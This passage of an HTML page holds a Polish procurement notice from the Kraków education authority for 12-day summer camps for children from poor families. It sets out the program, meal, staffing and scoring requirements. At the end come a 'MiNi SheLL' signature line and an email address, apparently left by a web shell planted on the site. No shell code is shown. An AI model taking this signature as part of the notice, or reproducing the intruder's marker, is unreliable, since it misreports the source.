h) Wykonawca zapewnia kadrę wypoczynku w czasie podróży i pobytu dzieci w placówce wypoczynku - zgodnie z wymogami art. 92p ust. 1-6 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.); liczba wychowawców wypoczynku musi być odpowiednia do liczby uczestników wypoczynku;
i) Wykonawca zapewnia dostęp do opieki medycznej - zgodnie z wymogami art. 92c ust. 2 pkt 3 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.) 
j) Wykonawca zapewnia bezpieczne korzystanie z wyznaczonego obszaru wodnego zgodnie 
z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. Nr 208, poz. 1240 z późn. zm.);
k) Wykonawca zapewnia bezpieczne przebywanie w górach oraz na zorganizowanych terenach narciarskich zgodnie z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie i ratownictwie 
w górach i na zorganizowanych terenach narciarskich (Dz. U. Nr 208, poz. 1241 z późn. zm.);
l) Rekrutacji uczestników wypoczynku dokona Zamawiający - Kuratorium Oświaty w Krakowie we współpracy z miejskimi lub gminnymi ośrodkami pomocy społecznej;
m) Wykonawca zbiera karty kwalifikacyjne uczestników wypoczynku, a po zakończeniu zadania ma obowiązek zdeponować je w wyodrębnionej dokumentacji źródłowej, zamkniętej sporządzonym sprawozdaniem;
n) obowiązkiem Wykonawcy jest przeprowadzenie procesu informacyjnego na rzecz rodziców (opiekunów prawnych) dzieci, oznaczenia miejsc zbiórek, czasu i terminów oraz koniecznych adresów i telefonów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ocena standardu obiektu - 10</li>
<li>3. Doświadczenie wykonawcy zamówienia - 10</li>
<li>4. Atrakcyjność programu pobytu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Zorganizowanie na terenie powiatu tarnowskiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: Zorganizowanie na terenie powiatu tarnowskiego stacjonarnych form wypoczynku dla 164 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze:
a) wypoczynek powinien uwzględniać zainteresowania tematyką historyczną i patriotyczną, 
z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu;
b) turnusy wypoczynkowe powinny ponadto posiadać wartość rekreacyjną z elementami związanymi z promowaniem zdrowego stylu życia wśród dzieci i młodzieży, zainteresowaniem aktywnością fizyczną, tematyką i działaniami rozwijającymi nawyk dbania o zdrowie fizyczne i psychiczne oraz zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację i edukację kulturalną;
c) organizacja wypoczynku musi być zgodna z wymogami ustawy z dnia 7 września 1991 r. 
o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.), a w szczególności jej art. 92a - 92t oraz rozporządzenia Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz. U. poz. 452);
d) dla realizacji zadania Wykonawca winien wykazać się posiadaniem stałej bazy lokalowej, która jest odpowiednia do prowadzenia zajęć w grupach oraz umożliwia prowadzenie form ruchowych o charakterze rekreacyjnym dla każdej z grup wychowawczych. Obiekt, w którym ma być zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska;
e) program wypoczynku:
Wykonawca powinien uwzględnić w programie wypoczynku zainteresowania tematyką historyczną i patriotyczną z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu,
Wykonawca powinien zapewnić realizację wypoczynku z elementami zajęć związanych z promowaniem profilaktyki oraz zdrowego stylu życia wśród dzieci i młodzieży, powinien zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację 
i edukację kulturalną, w programie wypoczynku powinien zostać przewidziany udział tematyki 
i działań rozwijających nawyk dbania o zdrowie fizyczne i psychiczne,
Wykonawca winien przewidzieć w ramach turnusu przynajmniej jedną atrakcyjną całodniową wycieczkę autokarową poza miejscowość w której odbywają się kolonie oraz zajęcia uwzględniające specyfikę wybranego zadania, dostosowane do rozwoju psychomotorycznego dziecka;
f) Wykonawca w organizacji kolonii uwzględnia:
koszty ubezpieczenia dzieci i kadry w czasie podróży i pobytu na koloniach od następstw nieszczęśliwych wypadków,
koszty dowozu (do placówki i z placówki wypoczynku); środki nie wykorzystane na ten cel przechodzą na realizację programu;
koszty biletów wstępu do zwiedzanych obiektów;
g) wyżywienie:
Wykonawca zapewnia minimum cztery posiłki dziennie (śniadanie, obiad, podwieczorek, kolacja);
Wykonawca zapewnia gorący posiłek po przyjeździe dzieci do placówki wypoczynku (bez względu na godzinę przyjazdu), oraz suchy prowiant na drogę powrotną oraz na czas wycieczek;
Wykonawca zapewnia stały dostęp do napojów ciepłych lub zimnych w zależności od warunków pogodowych;
Wykonawca zapewnia żywienie zgodne z zasadami higieny żywienia określonymi w ustawie 
z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594 
z późn. zm.);
h) Wykonawca zapewnia kadrę wypoczynku w czasie podróży i pobytu dzieci w placówce wypoczynku - zgodnie z wymogami art. 92p ust. 1-6 ustawy z dnia 7 września 1991 r. 
o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.); liczba wychowawców wypoczynku musi być odpowiednia do liczby uczestników wypoczynku;
i) Wykonawca zapewnia dostęp do opieki medycznej - zgodnie z wymogami art. 92c ust. 2 pkt 3 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.) 
j) Wykonawca zapewnia bezpieczne korzystanie z wyznaczonego obszaru wodnego zgodnie 
z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. Nr 208, poz. 1240 z późn. zm.);
k) Wykonawca zapewnia bezpieczne przebywanie w górach oraz na zorganizowanych terenach narciarskich zgodnie z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie i ratownictwie 
w górach i na zorganizowanych terenach narciarskich (Dz. U. Nr 208, poz. 1241 z późn. zm.);
l) Rekrutacji uczestników wypoczynku dokona Zamawiający - Kuratorium Oświaty w Krakowie we współpracy z miejskimi lub gminnymi ośrodkami pomocy społecznej;
m) Wykonawca zbiera karty kwalifikacyjne uczestników wypoczynku, a po zakończeniu zadania ma obowiązek zdeponować je w wyodrębnionej dokumentacji źródłowej, zamkniętej sporządzonym sprawozdaniem;
n) obowiązkiem Wykonawcy jest przeprowadzenie procesu informacyjnego na rzecz rodziców (opiekunów prawnych) dzieci, oznaczenia miejsc zbiórek, czasu i terminów oraz koniecznych adresów i telefonów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.23.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ocena standardu obiektu - 10</li>
<li>3. Doświadczenie wykonawcy zamówienia - 10</li>
<li>4. Atrakcyjność programu pobytu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III: Zorganizowanie na terenie powiatu tatrzańskiego stacjonarnych form wypoczynku dla 296 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III: Zorganizowanie na terenie powiatu tatrzańskiego stacjonarnych form wypoczynku dla 296 dzieci i młodzieży z rodzin najuboższych z terenu województwa małopolskiego w postaci 12-dniowych krajowych turnusów w miejscowościach zapewniających odpowiednie warunki zdrowotno-klimatyczne, bezpieczeństwa i opiekuńczo-wychowawcze:
a) wypoczynek powinien uwzględniać zainteresowania tematyką historyczną i patriotyczną, 
z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu;
b) turnusy wypoczynkowe powinny ponadto posiadać wartość rekreacyjną z elementami związanymi z promowaniem zdrowego stylu życia wśród dzieci i młodzieży, zainteresowaniem aktywnością fizyczną, tematyką i działaniami rozwijającymi nawyk dbania o zdrowie fizyczne i psychiczne oraz zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację i edukację kulturalną;
c) organizacja wypoczynku musi być zgodna z wymogami ustawy z dnia 7 września 1991 r. 
o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.), a w szczególności jej art. 92a - 92t oraz rozporządzenia Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz. U. poz. 452);
d) dla realizacji zadania Wykonawca winien wykazać się posiadaniem stałej bazy lokalowej, która jest odpowiednia do prowadzenia zajęć w grupach oraz umożliwia prowadzenie form ruchowych o charakterze rekreacyjnym dla każdej z grup wychowawczych. Obiekt, w którym ma być zorganizowany wypoczynek, musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska;
e) program wypoczynku:
Wykonawca powinien uwzględnić w programie wypoczynku zainteresowania tematyką historyczną i patriotyczną z możliwością pobytu w miejscach historycznych w regionie Małopolski, promować wychowanie do wartości społecznych i kulturowych, które zainspiruje uczestników wypoczynku do kierowania się tymi wartościami w codziennym życiu,
Wykonawca powinien zapewnić realizację wypoczynku z elementami zajęć związanych z promowaniem profilaktyki oraz zdrowego stylu życia wśród dzieci i młodzieży, powinien zachęcać do aktywnego działania i włączenia społecznego dzieci i młodzież poprzez animację 
i edukację kulturalną, w programie wypoczynku powinien zostać przewidziany udział tematyki 
i działań rozwijających nawyk dbania o zdrowie fizyczne i psychiczne,
Wykonawca winien przewidzieć w ramach turnusu przynajmniej jedną atrakcyjną całodniową wycieczkę autokarową poza miejscowość w której odbywają się kolonie oraz zajęcia uwzględniające specyfikę wybranego zadania, dostosowane do rozwoju psychomotorycznego dziecka;
f) Wykonawca w organizacji kolonii uwzględnia:
koszty ubezpieczenia dzieci i kadry w czasie podróży i pobytu na koloniach od następstw nieszczęśliwych wypadków,
koszty dowozu (do placówki i z placówki wypoczynku); środki nie wykorzystane na ten cel przechodzą na realizację programu;
koszty biletów wstępu do zwiedzanych obiektów;
g) wyżywienie:
Wykonawca zapewnia minimum cztery posiłki dziennie (śniadanie, obiad, podwieczorek, kolacja);
Wykonawca zapewnia gorący posiłek po przyjeździe dzieci do placówki wypoczynku (bez względu na godzinę przyjazdu), oraz suchy prowiant na drogę powrotną oraz na czas wycieczek;
Wykonawca zapewnia stały dostęp do napojów ciepłych lub zimnych w zależności od warunków pogodowych;
Wykonawca zapewnia żywienie zgodne z zasadami higieny żywienia określonymi w ustawie 
z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2015 r. poz. 594 
z późn. zm.);
h) Wykonawca zapewnia kadrę wypoczynku w czasie podróży i pobytu dzieci w placówce wypoczynku - zgodnie z wymogami art. 92p ust. 1-6 ustawy z dnia 7 września 1991 r. 
o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.); liczba wychowawców wypoczynku musi być odpowiednia do liczby uczestników wypoczynku;
i) Wykonawca zapewnia dostęp do opieki medycznej - zgodnie z wymogami art. 92c ust. 2 pkt 3 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2015 r. poz. 2156 z późn. zm.) 
j) Wykonawca zapewnia bezpieczne korzystanie z wyznaczonego obszaru wodnego zgodnie 
z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie osób przebywających na obszarach wodnych (Dz. U. Nr 208, poz. 1240 z późn. zm.);
k) Wykonawca zapewnia bezpieczne przebywanie w górach oraz na zorganizowanych terenach narciarskich zgodnie z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie i ratownictwie 
w górach i na zorganizowanych terenach narciarskich (Dz. U. Nr 208, poz. 1241 z późn. zm.);
l) Rekrutacji uczestników wypoczynku dokona Zamawiający - Kuratorium Oświaty w Krakowie we współpracy z miejskimi lub gminnymi ośrodkami pomocy społecznej;
m) Wykonawca zbiera karty kwalifikacyjne uczestników wypoczynku, a po zakończeniu zadania ma obowiązek zdeponować je w wyodrębnionej dokumentacji źródłowej, zamkniętej sporządzonym sprawozdaniem;
n) obowiązkiem Wykonawcy jest przeprowadzenie procesu informacyjnego na rzecz rodziców (opiekunów prawnych) dzieci, oznaczenia miejsc zbiórek, czasu i terminów oraz koniecznych adresów i telefonów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Ocena standardu obiektu - 10</li>
<li>3. Doświadczenie wykonawcy zamówienia - 10</li>
<li>4. Atrakcyjność programu pobytu - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com